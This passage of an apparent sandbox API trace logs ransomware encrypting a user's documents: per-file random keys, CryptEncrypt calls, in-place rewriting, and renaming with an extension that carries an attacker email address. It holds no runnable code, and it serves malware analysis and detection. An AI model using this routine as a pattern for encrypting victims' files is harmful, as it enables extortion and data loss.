hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0173.069] WriteFile (in: hFile=0x620, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0173.070] WriteFile (in: hFile=0x620, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0173.070] WriteFile (in: hFile=0x620, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0173.071] ReadFile (in: hFile=0x620, lpBuffer=0x3d6410, nNumberOfBytesToRead=0x7e68, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3d6410*, lpNumberOfBytesRead=0x2acf9c8*=0x7e68, lpOverlapped=0x0) returned 1 [0173.071] SetFilePointer (in: hFile=0x620, lDistanceToMove=-32360, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.071] WriteFile (in: hFile=0x620, lpBuffer=0x3110048*, nNumberOfBytesToWrite=0x7e68, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3110048*, lpNumberOfBytesWritten=0x2acf9c8*=0x7e68, lpOverlapped=0x0) returned 1 [0173.073] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0173.073] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0173.073] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\UtHFGQ1m.pptx", dwFileAttributes=0x80) returned 1 [0173.075] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\UtHFGQ1m.pptx") returned 83 [0173.075] GetProcessHeap () returned 0x2e0000 [0173.075] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10c) returned 0x32f900 [0173.075] lstrcpyW (in: lpString1=0x32f900, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\UtHFGQ1m.pptx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\UtHFGQ1m.pptx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\UtHFGQ1m.pptx" [0173.075] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\UtHFGQ1m.pptx", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\UtHFGQ1m.pptx.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\UtHFGQ1m.pptx.12781717671972518758.ex_parvis@aol.com.AIR" [0173.075] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\UtHFGQ1m.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\ddywzpzdkh7l9z1-g\\uthfgq1m.pptx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\UtHFGQ1m.pptx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\ddywzpzdkh7l9z1-g\\uthfgq1m.pptx.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0173.078] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\UtHFGQ1m.pptx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\ddywzpzdkh7l9z1-g\\uthfgq1m.pptx.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x620 [0173.078] GetProcessHeap () returned 0x2e0000 [0173.078] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x32f900 | out: hHeap=0x2e0000) returned 1 [0173.078] GetFileSizeEx (in: hFile=0x620, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=9683) returned 1 [0173.078] SetFilePointer (in: hFile=0x620, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x25d3 [0173.078] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0173.078] GetProcessHeap () returned 0x2e0000 [0173.078] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0173.078] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0173.078] WriteFile (in: hFile=0x620, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0173.079] WriteFile (in: hFile=0x620, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0173.079] WriteFile (in: hFile=0x620, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0173.079] ReadFile (in: hFile=0x620, lpBuffer=0x3d6410, nNumberOfBytesToRead=0x25d3, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3d6410*, lpNumberOfBytesRead=0x2acf9c8*=0x25d3, lpOverlapped=0x0) returned 1 [0173.080] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0173.080] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0173.080] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\kpfq49aKfn.pps", dwFileAttributes=0x80) returned 1 [0173.081] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\kpfq49aKfn.pps") returned 84 [0173.081] GetProcessHeap () returned 0x2e0000 [0173.081] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10e) returned 0x32f900 [0173.081] lstrcpyW (in: lpString1=0x32f900, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\kpfq49aKfn.pps" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\kpfq49aKfn.pps") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\kpfq49aKfn.pps" [0173.081] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\kpfq49aKfn.pps", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\kpfq49aKfn.pps.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\kpfq49aKfn.pps.12781717671972518758.ex_parvis@aol.com.AIR" [0173.081] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\kpfq49aKfn.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\ddywzpzdkh7l9z1-g\\kpfq49akfn.pps"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\kpfq49aKfn.pps.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\ddywzpzdkh7l9z1-g\\kpfq49akfn.pps.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0173.084] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\kpfq49aKfn.pps.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\ddywzpzdkh7l9z1-g\\kpfq49akfn.pps.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x620 [0173.084] GetProcessHeap () returned 0x2e0000 [0173.084] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x32f900 | out: hHeap=0x2e0000) returned 1 [0173.084] GetFileSizeEx (in: hFile=0x620, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=96301) returned 1 [0173.084] SetFilePointer (in: hFile=0x620, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x1782d [0173.084] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0173.084] GetProcessHeap () returned 0x2e0000 [0173.084] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0173.084] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0173.084] WriteFile (in: hFile=0x620, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0173.085] WriteFile (in: hFile=0x620, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0173.085] WriteFile (in: hFile=0x620, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0173.086] ReadFile (in: hFile=0x620, lpBuffer=0x3110048, nNumberOfBytesToRead=0x1782d, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3110048*, lpNumberOfBytesRead=0x2acf9c8*=0x1782d, lpOverlapped=0x0) returned 1 [0173.090] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0173.090] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0173.090] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\J8qhD721S.odt", dwFileAttributes=0x80) returned 1 [0173.090] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\J8qhD721S.odt") returned 83 [0173.090] GetProcessHeap () returned 0x2e0000 [0173.090] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10c) returned 0x32f900 [0173.090] lstrcpyW (in: lpString1=0x32f900, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\J8qhD721S.odt" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\J8qhD721S.odt") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\J8qhD721S.odt" [0173.090] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\J8qhD721S.odt", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\J8qhD721S.odt.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\J8qhD721S.odt.12781717671972518758.ex_parvis@aol.com.AIR" [0173.090] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\J8qhD721S.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\ddywzpzdkh7l9z1-g\\j8qhd721s.odt"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\J8qhD721S.odt.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\ddywzpzdkh7l9z1-g\\j8qhd721s.odt.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0173.093] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\J8qhD721S.odt.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\ddywzpzdkh7l9z1-g\\j8qhd721s.odt.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x620 [0173.093] GetProcessHeap () returned 0x2e0000 [0173.093] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x32f900 | out: hHeap=0x2e0000) returned 1 [0173.093] GetFileSizeEx (in: hFile=0x620, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=4497) returned 1 [0173.093] SetFilePointer (in: hFile=0x620, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x1191 [0173.094] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0173.094] GetProcessHeap () returned 0x2e0000 [0173.094] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0173.094] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0173.094] WriteFile (in: hFile=0x620, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0173.095] WriteFile (in: hFile=0x620, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0173.095] WriteFile (in: hFile=0x620, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0173.095] ReadFile (in: hFile=0x620, lpBuffer=0x3d6410, nNumberOfBytesToRead=0x1191, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3d6410*, lpNumberOfBytesRead=0x2acf9c8*=0x1191, lpOverlapped=0x0) returned 1 [0173.095] SetFilePointer (in: hFile=0x620, lDistanceToMove=-4497, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.095] WriteFile (in: hFile=0x620, lpBuffer=0x3d75b0*, nNumberOfBytesToWrite=0x1191, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3d75b0*, lpNumberOfBytesWritten=0x2acf9c8*=0x1191, lpOverlapped=0x0) returned 1 [0173.096] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0173.096] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0173.096] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\HzILSE5sKy4i.rtf", dwFileAttributes=0x80) returned 1 [0173.097] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\HzILSE5sKy4i.rtf") returned 86 [0173.097] GetProcessHeap () returned 0x2e0000 [0173.097] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x112) returned 0x32f900 [0173.097] lstrcpyW (in: lpString1=0x32f900, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\HzILSE5sKy4i.rtf" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\HzILSE5sKy4i.rtf") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\HzILSE5sKy4i.rtf" [0173.097] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\HzILSE5sKy4i.rtf", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\HzILSE5sKy4i.rtf.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\HzILSE5sKy4i.rtf.12781717671972518758.ex_parvis@aol.com.AIR" [0173.097] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\HzILSE5sKy4i.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\ddywzpzdkh7l9z1-g\\hzilse5sky4i.rtf"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\HzILSE5sKy4i.rtf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\ddywzpzdkh7l9z1-g\\hzilse5sky4i.rtf.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0173.099] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\HzILSE5sKy4i.rtf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\ddywzpzdkh7l9z1-g\\hzilse5sky4i.rtf.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x620 [0173.100] GetProcessHeap () returned 0x2e0000 [0173.100] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x32f900 | out: hHeap=0x2e0000) returned 1 [0173.100] GetFileSizeEx (in: hFile=0x620, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=10101) returned 1 [0173.100] SetFilePointer (in: hFile=0x620, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x2775 [0173.100] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0173.100] GetProcessHeap () returned 0x2e0000 [0173.100] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0173.100] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0173.100] WriteFile (in: hFile=0x620, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0173.101] WriteFile (in: hFile=0x620, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0173.101] WriteFile (in: hFile=0x620, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0173.101] ReadFile (in: hFile=0x620, lpBuffer=0x3d6410, nNumberOfBytesToRead=0x2775, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3d6410*, lpNumberOfBytesRead=0x2acf9c8*=0x2775, lpOverlapped=0x0) returned 1 [0173.102] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0173.102] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0173.102] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\36zD7hHQw3V.csv", dwFileAttributes=0x80) returned 1 [0173.102] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\36zD7hHQw3V.csv") returned 85 [0173.102] GetProcessHeap () returned 0x2e0000 [0173.102] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x110) returned 0x32f900 [0173.102] lstrcpyW (in: lpString1=0x32f900, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\36zD7hHQw3V.csv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\36zD7hHQw3V.csv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\36zD7hHQw3V.csv" [0173.102] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\36zD7hHQw3V.csv", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\36zD7hHQw3V.csv.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\36zD7hHQw3V.csv.12781717671972518758.ex_parvis@aol.com.AIR" [0173.102] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\36zD7hHQw3V.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\ddywzpzdkh7l9z1-g\\36zd7hhqw3v.csv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\36zD7hHQw3V.csv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\ddywzpzdkh7l9z1-g\\36zd7hhqw3v.csv.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0173.105] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\36zD7hHQw3V.csv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\ddywzpzdkh7l9z1-g\\36zd7hhqw3v.csv.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x620 [0173.105] GetProcessHeap () returned 0x2e0000 [0173.105] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x32f900 | out: hHeap=0x2e0000) returned 1 [0173.105] GetFileSizeEx (in: hFile=0x620, 